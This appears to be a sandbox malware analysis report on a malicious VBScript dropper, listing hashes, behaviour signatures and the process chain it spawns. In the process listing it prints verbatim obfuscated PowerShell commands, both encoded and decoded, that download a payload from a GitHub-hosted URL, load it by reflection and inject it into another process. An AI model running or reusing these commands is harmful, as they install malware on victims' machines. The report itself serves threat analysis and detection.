Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
04/10/2024, 22:22
General
-
Target
31agosto.vbs
-
Size
480KB
-
MD5
b9dbaa8493f8539ec491076723a57f6d
-
SHA1
c8b7f6625d77483f118ab91aa98a2e612feb714c
-
SHA256
998c65637736fe8c32b932809868eb2ef60411273bb18d8f389b5f3e1c72ebc2
-
SHA512
2d4a409d9fe88ac9aad7766db757a19b23ac6cd42650682de6db6d27ed3aa50ca84c7bb8af069458369d662f370c0361cbd4adb54fbebc694b8f7242443787d2
-
SSDEEP
12288:kn7449lZb/RYfKsB5rGJxzJK37mBQHAIgfBkM0IzpyA22Xjidu2Bw41pk7/rXZ0z:e1Bcxo0
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31agosto.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU52T2tlLWV4UFJlc1NJb04gKCgnTk9mdXJsID0nKycgNVYwaHR0cCcrJ3M6Ly9yYScrJ3cuZ2l0JysnaHUnKydidXNlcmNvJysnbnQnKydlbnQuY29tL05vRGUnKyd0ZWN0T24vTm9EZXRlYycrJ3RPJysnbi9yJysnZWZzL2hlYWRzLycrJ21haW4nKycvRGUnKyd0JysnYWhObycrJ3RoLScrJ1YudCcrJ3h0JysnNVYwJysnOycrJyBOT2ZiYXNlNicrJzQnKydDb250ZW50JysnID0gKE5ldy1PYmonKydlY3QgUycrJ3lzdGVtLicrJ05ldC4nKydXZWJDbGllbnQpLkRvd25sJysnb2EnKydkUycrJ3RyJysnaW5nKE5PZnVybCk7ICcrJ05PZmJpbicrJ2FyeUNvbnRlJysnbnQnKycgPSBbJysnU3lzdGVtJysnLkNvJysnbicrJ3ZlcnRdOjpGJysncm9tQmEnKydzZTY0U3RyaW5nKE5PZmJhJysnc2U2NENvbnRlbnQpOyBOT2ZhcycrJ3NlbScrJ2JseSAnKyc9IFtSZScrJ2YnKydsZWN0aScrJ29uLkFzJysnc2VtYicrJ2x5JysnXTo6TCcrJ29hZChOT2ZiaScrJ25hcicrJ3lDb250ZW4nKyd0KTsgW2QnKydubGliLicrJ0lPJysnLkhvbWVdJysnOjpWQUkoSTJIdHh0JysnLnNvY21lci8nKydzZCcrJ2EnKydvbG53b2QnKycvc2FnY3NlZC8nKydmZGhiJysnZmR6JysnLycrJ2dyby50ZWtjJysndWInKyd0aWIvJysnLzpzcCcrJ3R0aEkySCwgJysnSTJIZCcrJ2VzYXRpdmFkb0kyJysnSCcrJywgSTJIZGVzYScrJ3RpdmFkbycrJ0kySCwgSTJIZGUnKydzYXQnKydpdmFkb0knKycySCcrJywnKycgSTInKydIQWRkSW4nKydQcm9jZScrJ3NzMzJJMkgsICcrJ0kySEkySCxJMkhJMkgpJykucmVQbEFjZSgoW0NoQXJdNTMrW0NoQXJdODYrW0NoQXJdNDgpLFtzVHJpbkddW0NoQXJdMzkpLnJlUGxBY2UoJ0kySCcsW3NUcmluR11bQ2hBcl0zNCkucmVQbEFjZSgoW0NoQXJdNzgrW0NoQXJdNzkrW0NoQXJdMTAyKSxbc1RyaW5HXVtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INvOke-exPResSIoN (('NOfurl ='+' 5V0http'+'s://ra'+'w.git'+'hu'+'buserco'+'nt'+'ent.com/NoDe'+'tectOn/NoDetec'+'tO'+'n/r'+'efs/heads/'+'main'+'/De'+'t'+'ahNo'+'th-'+'V.t'+'xt'+'5V0'+';'+' NOfbase6'+'4'+'Content'+' = (New-Obj'+'ect S'+'ystem.'+'Net.'+'WebClient).Downl'+'oa'+'dS'+'tr'+'ing(NOfurl); '+'NOfbin'+'aryConte'+'nt'+' = ['+'System'+'.Co'+'n'+'vert]::F'+'romBa'+'se64String(NOfba'+'se64Content); NOfas'+'sem'+'bly '+'= [Re'+'f'+'lecti'+'on.As'+'semb'+'ly'+']::L'+'oad(NOfbi'+'nar'+'yConten'+'t); [d'+'nlib.'+'IO'+'.Home]'+'::VAI(I2Htxt'+'.socmer/'+'sd'+'a'+'olnwod'+'/sagcsed/'+'fdhb'+'fdz'+'/'+'gro.tekc'+'ub'+'tib/'+'/:sp'+'tthI2H, '+'I2Hd'+'esativadoI2'+'H'+', I2Hdesa'+'tivado'+'I2H, I2Hde'+'sat'+'ivadoI'+'2H'+','+' I2'+'HAddIn'+'Proce'+'ss32I2H, '+'I2HI2H,I2HI2H)').rePlAce(([ChAr]53+[ChAr]86+[ChAr]48),[sTrinG][ChAr]39).rePlAce('I2H',[sTrinG][ChAr]34).rePlAce(([ChAr]78+[ChAr]79+[ChAr]102),[sTrinG][ChAr]36))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD584f50c550941a288d8140cd0e10d9245
SHA13cf7880e54e94fda19bc8e2bf6e1d961ffe5e66c
SHA256baa77ef05c97b6753c5ffbf931415ce0e52931ff806082630a9c38f924a7ba24
SHA512d9aca96bc8141e44ef078c7ab1cff14e2c2fcf05264c99a5e134a3490f4b6782e8d80ce98f953df6c98a94bd9b06d95e978339ceb571486b22ba8f592a7551cf
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB